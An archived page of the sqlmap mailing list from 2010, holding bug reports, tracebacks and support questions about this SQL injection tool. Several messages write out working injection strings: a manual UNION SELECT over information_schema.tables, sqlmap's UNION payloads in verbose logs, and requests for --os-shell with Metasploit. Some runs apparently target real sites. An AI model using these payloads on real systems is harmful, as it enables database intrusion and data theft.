sqlmap-users Mailing List for sqlmap (Page 129)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Daliev I. <da...@ya...> - 2010-04-02 08:37:43
|
Hello SQLMAP users. Version: sqlmap/0.8-rc7 When using partial (single row) inband sql injection with mssql sqlmap uses construction like this field1=field1_value union all select top 1 some_field from some_table where some_field not in (select top N some_field from some_table) Microsoft says that unordered result set with top clause are nondeterministic. Even more, results obtained with different N are the same. May be it's better to use skip/limit clause or something like this field1=field1_value union all select top 1 some_field from some_table where some_field not in (select top N some_field from some_table order by 1) and some_field in (select top N+1 some_field from some_table order by 1) Regards, Daliev Ilya |
From: Miroslav S. <mir...@gm...> - 2010-03-31 08:32:43
|
Hi. You've probably come to the problem of dealing with unicode symbols in sql injection. Currently (in blind injection) we use bisection algorithm with settings for ASCII coding, but we could research how to use it with Unicode too. As this is not a one day job (we have to find some universal solution, adapt it and test it for usage on all supported DBMSes) we'll put it on a queue. Kind regards, Miroslav Stampar On 29.3.2010 16:55, Smith Andy wrote: > Hello, > first I just want to say that your sqlmap tool is the best there is > online for SQLi. > however I've been facing a problem that I wasn't able to solve > when dumping a column contents, sometimes, the contents are in Japanes > or Arabic ...etc (not in english) > in which case sqlmap doesn't get the contents properly (I get > gibberish symbols) > even in the session file, the column contents doesn't get written > correctly. > I was hoping you can help me with this problem. > > Thanks a lot, > Matt Lun. > > ------------------------------------------------------------------------ > Hotmail has tools for the New Busy. Search, chat and e-mail from your > inbox. Learn More. > <http://www.windowslive.com/campaign/thenewbusy?ocid=PID27925::T:WLMTAGL:ON:WL:en-US:WM_HMP:032010_1> > > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Smith A. <te...@ho...> - 2010-03-29 14:55:18
|
Hello, first I just want to say that your sqlmap tool is the best there is online for SQLi. however I've been facing a problem that I wasn't able to solve when dumping a column contents, sometimes, the contents are in Japanes or Arabic ...etc (not in english) in which case sqlmap doesn't get the contents properly (I get gibberish symbols) even in the session file, the column contents doesn't get written correctly. I was hoping you can help me with this problem. Thanks a lot, Matt Lun. _________________________________________________________________ Hotmail has tools for the New Busy. Search, chat and e-mail from your inbox. http://www.windowslive.com/campaign/thenewbusy?ocid=PID27925::T:WLMTAGL:ON:WL:en-US:WM_HMP:032010_1 |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-26 20:44:46
|
Fixed and committed. Thanks, Bernardo On Fri, Mar 26, 2010 at 19:42, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py ... --roles > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:39:53 > > [16:39:53] [WARNING] the testable parameter 'unidade' you provided is not > into the Cookie > [16:39:53] [INFO] using > '/home/skys/sqlmap-dev/output/portais.ufg.br/session' as session file > [16:39:53] [INFO] resuming match ratio '0.848' from session file > [16:39:53] [INFO] resuming injection point 'POST' from session file > [16:39:53] [INFO] resuming injection parameter 'unidade' from session file > [16:39:53] [INFO] resuming injection type 'numeric' from session file > [16:39:53] [INFO] resuming 0 number of parenthesis from session file > [16:39:53] [INFO] resuming back-end DBMS 'postgresql' from session file > [16:39:53] [INFO] resuming union comment '--' from session file > [16:39:53] [INFO] resuming union count 8 from session file > [16:39:53] [INFO] resuming union position 2 from session file > [16:39:53] [INFO] testing connection to the target url > [16:39:53] [INFO] testing for parenthesis on injectable parameter > [16:39:53] [INFO] the back-end DBMS is PostgreSQL > > web application technology: PHP 5.2.12, Apache 2.2.14 > back-end DBMS: PostgreSQL > > [16:39:53] [INFO] fetching database users privileges > [16:39:53] [INFO] read from file 'xxx': xxx > > [16:39:53] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.9-dev > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 75, in main > start() > File "/home/skys/sqlmap-dev/lib/controller/controller.py", line 260, in > start > action() > File "/home/skys/sqlmap-dev/lib/controller/action.py", line 106, in action > conf.dbmsHandler.getRoles(), "role") > File "/home/skys/sqlmap-dev/lib/core/dump.py", line 110, in userSettings > users = userSettings.keys() > AttributeError: 'NoneType' object has no attribute 'keys' > > [*] shutting down at: 16:39:53 > > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: David G. <sk...@gm...> - 2010-03-26 19:42:57
|
# ./sqlmap.py ... --roles sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 16:39:53 [16:39:53] [WARNING] the testable parameter 'unidade' you provided is not into the Cookie [16:39:53] [INFO] using '/home/skys/sqlmap-dev/output/portais.ufg.br/session' as session file [16:39:53] [INFO] resuming match ratio '0.848' from session file [16:39:53] [INFO] resuming injection point 'POST' from session file [16:39:53] [INFO] resuming injection parameter 'unidade' from session file [16:39:53] [INFO] resuming injection type 'numeric' from session file [16:39:53] [INFO] resuming 0 number of parenthesis from session file [16:39:53] [INFO] resuming back-end DBMS 'postgresql' from session file [16:39:53] [INFO] resuming union comment '--' from session file [16:39:53] [INFO] resuming union count 8 from session file [16:39:53] [INFO] resuming union position 2 from session file [16:39:53] [INFO] testing connection to the target url [16:39:53] [INFO] testing for parenthesis on injectable parameter [16:39:53] [INFO] the back-end DBMS is PostgreSQL web application technology: PHP 5.2.12, Apache 2.2.14 back-end DBMS: PostgreSQL [16:39:53] [INFO] fetching database users privileges [16:39:53] [INFO] read from file 'xxx': xxx [16:39:53] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.5.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 75, in main start() File "/home/skys/sqlmap-dev/lib/controller/controller.py", line 260, in start action() File "/home/skys/sqlmap-dev/lib/controller/action.py", line 106, in action conf.dbmsHandler.getRoles(), "role") File "/home/skys/sqlmap-dev/lib/core/dump.py", line 110, in userSettings users = userSettings.keys() AttributeError: 'NoneType' object has no attribute 'keys' [*] shutting down at: 16:39:53 -- David Gomes Guimarães |
From: Pagera <pag...@gm...> - 2010-03-26 14:32:45
|
hello it didnt wrok what im trying to do is sqlmap -u "http://example.com/images.php?id=10" --string="id" the url is vulnerable cuz when i use the browser with http://example.com/images.php?id=10 and 1=2 im able to see the MySql error and i tried so much function like version() it works i also used http://example.com/images.php?id=10 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables and i got the table names but when using sqlmap there is nothing it acts like the url is not vulnerable i also used --prefix="id" --postfix="1=1" and also nothing David Guimaraes wrote: > Try passing --string parameter to sqlmap. > > --string=STRING String to match in page when the query is valid > > On Thu, Mar 25, 2010 at 6:18 PM, Pagera <pag...@gm... > <mailto:pag...@gm...>> wrote: > > Hello and hope fine > thank bernardo for the DirBuster > > a question about Blind sql injection > does SQLMap support this mode? > > i used --UNION-USE but it failed .. i have a vulnerable url > im able to view all database information by manipulating the http url > like "version() , etc > but when im using SQLMap the result is that this url is not > vulnerable!!! > > im wondering if its cuz of not supporting Blind Mode? > > and thank for help > > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > David Gomes Guimarães |
From: Miroslav S. <mir...@gm...> - 2010-03-26 11:53:57
|
Hi. As Bernardo mentioned, it's probably a connectivity fault. Nevertheless, now we've added a support for this kind of error in form of a sqlmap error message, instead of that ugly "socket timeout". Kind regards. On Fri, Mar 26, 2010 at 11:37 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > Please provide the command line you used to launch sqlmap and possibly > the output with -v5. > It looks to me that you launched with -g and without Internet > connectivity, but I might be wrong lacking of proper details. > > Bernardo > > > On Thu, Mar 25, 2010 at 12:50, Fahad Al Shunaiber <fh...@gm...> wrote: >> sqlmap version: 0.8 >> Python version: 2.6.2 >> Operating system: win32 >> Traceback (most recent call last): >> File "sqlmap.py", line 74, in main >> File "lib\core\option.pyc", line 1137, in init >> File "lib\core\option.pyc", line 247, in __setGoogleDorking >> File "lib\utils\google.pyc", line 115, in search >> File "socket.pyc", line 327, in read >> File "httplib.pyc", line 537, in read >> File "socket.pyc", line 351, in read >> timeout: timed out >> >> [*] shutting down at: 15:48:08 >> >> ------------------------------------------------------------------------------ >> Download Intel® Parallel Studio Eval >> Try the new software tools for yourself. Speed compiling, find bugs >> proactively, and fine-tune applications for parallel performance. >> See why Intel Parallel Studio got high marks during beta. >> http://p.sf.net/sfu/intel-sw-dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-26 10:37:16
|
Please provide the command line you used to launch sqlmap and possibly the output with -v5. It looks to me that you launched with -g and without Internet connectivity, but I might be wrong lacking of proper details. Bernardo On Thu, Mar 25, 2010 at 12:50, Fahad Al Shunaiber <fh...@gm...> wrote: > sqlmap version: 0.8 > Python version: 2.6.2 > Operating system: win32 > Traceback (most recent call last): > File "sqlmap.py", line 74, in main > File "lib\core\option.pyc", line 1137, in init > File "lib\core\option.pyc", line 247, in __setGoogleDorking > File "lib\utils\google.pyc", line 115, in search > File "socket.pyc", line 327, in read > File "httplib.pyc", line 537, in read > File "socket.pyc", line 351, in read > timeout: timed out > > [*] shutting down at: 15:48:08 > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: David G. <sk...@gm...> - 2010-03-26 00:20:49
|
Try passing --string parameter to sqlmap. --string=STRING String to match in page when the query is valid On Thu, Mar 25, 2010 at 6:18 PM, Pagera <pag...@gm...> wrote: > Hello and hope fine > thank bernardo for the DirBuster > > a question about Blind sql injection > does SQLMap support this mode? > > i used --UNION-USE but it failed .. i have a vulnerable url > im able to view all database information by manipulating the http url > like "version() , etc > but when im using SQLMap the result is that this url is not vulnerable!!! > > im wondering if its cuz of not supporting Blind Mode? > > and thank for help > > > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- David Gomes Guimarães |
From: Pagera <pag...@gm...> - 2010-03-25 21:15:10
|
Hello and hope fine thank bernardo for the DirBuster a question about Blind sql injection does SQLMap support this mode? i used --UNION-USE but it failed .. i have a vulnerable url im able to view all database information by manipulating the http url like "version() , etc but when im using SQLMap the result is that this url is not vulnerable!!! im wondering if its cuz of not supporting Blind Mode? and thank for help |
From: Fahad Al S. <fh...@gm...> - 2010-03-25 12:50:58
|
sqlmap version: 0.8 Python version: 2.6.2 Operating system: win32 Traceback (most recent call last): File "sqlmap.py", line 74, in main File "lib\core\option.pyc", line 1137, in init File "lib\core\option.pyc", line 247, in __setGoogleDorking File "lib\utils\google.pyc", line 115, in search File "socket.pyc", line 327, in read File "httplib.pyc", line 537, in read File "socket.pyc", line 351, in read timeout: timed out [*] shutting down at: 15:48:08 |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-25 10:24:40
|
This happens when I merge back into trunk from a branch. If you svn checkout again a working copy it will solve the problem. Bernardo On Wed, Mar 24, 2010 at 15:07, Kasper Føns <th...@ma...> wrote: > Hi > > I can't seem to update from svn anymore. It asks for a username/password > pair now. > > /Kasper > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-25 10:23:49
|
Try DirBuster, http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project sqlmap has limited regular expression to detect file system paths so far. Bernardo On Mon, Mar 22, 2010 at 12:20, Pagera <pag...@gm...> wrote: > hello and hope u fine > > when im trying --os-shell with --msf > after a while is give me a message like > please provide full path document root > how can i know the full path ? > > is there any way to know the path document root full path from sqlmap? > or i have to use another tool to get job done? > > and thank for help > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Kasper F. <th...@ma...> - 2010-03-24 15:07:29
|
Hi I can't seem to update from svn anymore. It asks for a username/password pair now. /Kasper |
From: Patrick W. <pa...@au...> - 2010-03-23 14:09:18
|
Try information disclosure stuff... like umm, manual, Nikto or .. something ;p I suppose sqlmap could predetermine this if necessary under specific circumstances (devs!)... but we do it manually and it depends on permissions of operating systems, folders and files. -Patrick On Mon, Mar 22, 2010 at 11:20 PM, Pagera <pag...@gm...> wrote: > hello and hope u fine > > when im trying --os-shell with --msf > after a while is give me a message like > please provide full path document root > how can i know the full path ? > > is there any way to know the path document root full path from sqlmap? > or i have to use another tool to get job done? > > and thank for help > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-22 15:38:12
|
Fixed and committed. Thanks for reporting David. Bernardo On Fri, Mar 19, 2010 at 02:22, David Guimaraes <sk...@gm...> wrote: > When I try to run the sqlmap this way: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" > -p art --string WRAPED > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:53:24 > > [22:53:24] [DEBUG] initializing the configuration > [22:53:24] [DEBUG] initializing the knowledge base > [22:53:24] [DEBUG] cleaning up configuration parameters > [22:53:24] [DEBUG] setting the HTTP timeout > [22:53:24] [DEBUG] setting the HTTP method to GET > [22:53:24] [DEBUG] creating HTTP requests opener object > [22:53:24] [DEBUG] parsing XML queries file > [22:53:24] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:53:24] [INFO] testing connection to the target url > [22:53:25] [INFO] testing if the provided string is within the target > URL page content > [22:53:29] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' > [22:53:29] [DEBUG] got HTTP error code: 500 > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [22:53:30] [INFO] testing for parenthesis on injectable parameter > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [INFO] the injectable parameter requires 0 parenthesis > [22:53:32] [INFO] testing MySQL > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [WARNING] the back-end DMBS is not MySQL > [22:53:32] [INFO] testing Oracle > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not Oracle > [22:53:33] [INFO] testing PostgreSQL > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL > [22:53:33] [INFO] testing Microsoft SQL Server > [22:53:34] [DEBUG] got HTTP error code: 500 > [22:53:34] [INFO] confirming Microsoft SQL Server > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:53:35] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [22:53:47] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [22:53:48] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' > > [22:53:49] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 22:53:49 > > > > > > > > > > > He notes correctly UNIONSQLi and ends OK. Soon after that, I try to > recover the database by including only the argument "--dbs" and he can > not recover in advance with the UNIONSQLi strange reason described > below and to the BLINDSQLi. He tries to find the right table name > without first knowing how many there really are through the use of the > UNIONSQLi and direct try to find out how many there are and their > names using the BLINDSQLi. > > Example with resume: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:54:40 > > [22:54:40] [DEBUG] initializing the configuration > [22:54:40] [DEBUG] initializing the knowledge base > [22:54:40] [DEBUG] cleaning up configuration parameters > [22:54:40] [DEBUG] setting the HTTP timeout > [22:54:40] [DEBUG] setting the HTTP method to GET > [22:54:40] [DEBUG] creating HTTP requests opener object > [22:54:40] [DEBUG] parsing XML queries file > [22:54:40] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:54:40] [INFO] resuming string match 'WRAPED' from session file > [22:54:40] [INFO] resuming injection point 'GET' from session file > [22:54:40] [INFO] resuming injection parameter 'art' from session file > [22:54:40] [INFO] resuming injection type 'numeric' from session file > [22:54:40] [INFO] resuming 0 number of parenthesis from session file > [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' > from session file > [22:54:40] [INFO] resuming union comment '--' from session file > [22:54:40] [INFO] resuming union count 6 from session file > [22:54:40] [INFO] resuming union position 2 from session file > [22:54:40] [INFO] testing connection to the target url > [22:54:43] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:54:43] [INFO] testing for parenthesis on injectable parameter > [22:54:43] [DEBUG] skipping test for MySQL > [22:54:43] [DEBUG] skipping test for Oracle > [22:54:43] [DEBUG] skipping test for PostgreSQL > [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:54:43] [INFO] fetching database names > [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 > [22:54:44] [DEBUG] got HTTP error code: 500 > [22:54:45] [WARNING] for some reasons it was not possible to retrieve > the query output through inband SQL injection technique, sqlmap is > going blind > [22:54:45] [INFO] fetching number of databases > [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) > AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases > [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 > [22:54:48] [DEBUG] got HTTP error code: 500 > . > . > . > [23:12:13] [DEBUG] performed 42 queries in 16 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:12:13] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:12:13 > > > > > > > > > > > > But if I delete the session and send the sqlmap start over with the > "--dbs" activated, it correctly retrieves how many databases and their > names using the correct technique (UNIONSQLi). > > Example without resume (using --dbs first time): > # rm -rf output/* > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 23:16:02 > > [23:16:02] [DEBUG] initializing the configuration > [23:16:02] [DEBUG] initializing the knowledge base > [23:16:02] [DEBUG] cleaning up configuration parameters > [23:16:02] [DEBUG] setting the HTTP timeout > [23:16:02] [DEBUG] setting the HTTP method to GET > [23:16:02] [DEBUG] creating HTTP requests opener object > [23:16:02] [DEBUG] parsing XML queries file > [23:16:02] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [23:16:02] [INFO] testing connection to the target url > [23:16:02] [INFO] testing if the provided string is within the target > URL page content > [23:16:03] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [23:16:05] [INFO] testing for parenthesis on injectable parameter > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [INFO] the injectable parameter requires 0 parenthesis > [23:16:06] [INFO] testing MySQL > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [WARNING] the back-end DMBS is not MySQL > [23:16:06] [INFO] testing Oracle > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not Oracle > [23:16:07] [INFO] testing PostgreSQL > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL > [23:16:07] [INFO] testing Microsoft SQL Server > [23:16:08] [DEBUG] got HTTP error code: 500 > [23:16:08] [INFO] confirming Microsoft SQL Server > [23:16:14] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [23:16:15] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 